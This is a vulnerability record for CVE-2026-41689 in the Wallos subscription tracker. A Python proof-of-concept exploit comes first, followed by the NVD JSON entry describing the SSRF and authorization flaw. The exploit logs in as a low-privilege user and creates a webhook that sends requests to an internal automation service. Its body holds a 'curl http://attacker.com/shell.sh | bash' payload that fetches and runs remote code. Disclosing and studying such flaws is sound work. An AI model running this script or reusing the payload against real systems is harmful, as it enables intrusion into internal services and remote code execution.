CVE-2026-41689

import requests # Target Wallos instance URL target_host = "http://localhost:8080" login_url = f"{target_host}/login" webhook_url = f"{target_host}/api/webhooks" # Attacker credentials credentials = { "username": "low_priv_user", "password": "password123" } # Internal vulnerable service in the allowlist (e.g., Jenkins, GitLab) internal_target = "http://internal-automation:8080/job/deploy/build" # 1. Login to get session session = requests.Session() login_resp = session.post(login_url, data=credentials) if login_resp.status_code == 200: # 2. Configure malicious webhook pointing to internal service malicious_webhook = { "name": "Backup Sync", "url": internal_target, "method": "POST", "headers": { "Content-Type": "application/json" }, # Payload to trigger RCE on the internal service "body": "{\"parameter\": [{\"name\": \"SCRIPT\", \"value\": \"curl http://attacker.com/shell.sh | bash\"}]}" } # 3. Send the webhook configuration create_resp = session.post(webhook_url, json=malicious_webhook) if create_resp.status_code == 201: print("[+] Malicious webhook created successfully.") print("[+] Server will now send SSRF requests to internal automation service.") else: print("[-] Failed to create webhook.") else: print("[-] Login failed.")

{"cve": {"id": "CVE-2026-41689", "sourceIdentifier": "[email protected]", "published": "2026-05-07T15:16:09.387", "lastModified": "2026-05-07T16:16:20.623", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Wallos is an open-source, self-hostable personal subscription tracker. In versions 4.8.4 and prior, the webhook notification feature reuses an administrator-configured local-target allowlist for every logged-in user. Any normal user can fully control a webhook URL, headers, and body, then use Wallos to send server-side requests to allowlisted internal automation services. When such a target exposes deployment or execution APIs, this can further enable adjacent-service RCE, but that downstream result is conditional on the target service. At time of publication, there are no publicly available patches."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:L/I:L/A:L", "baseScore": 6.0, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.8, "impactScore": 3.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-863"}, {"lang": "en", "value": "CWE-918"}]}], "references": [{"url": "https://github.com/ellite/Wallos/security/advisories/GHSA-jx6w-832g-42wv", "source": "[email protected]"}, {"url": "https://github.com/ellite/Wallos/security/advisories/GHSA-jx6w-832g-42wv", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}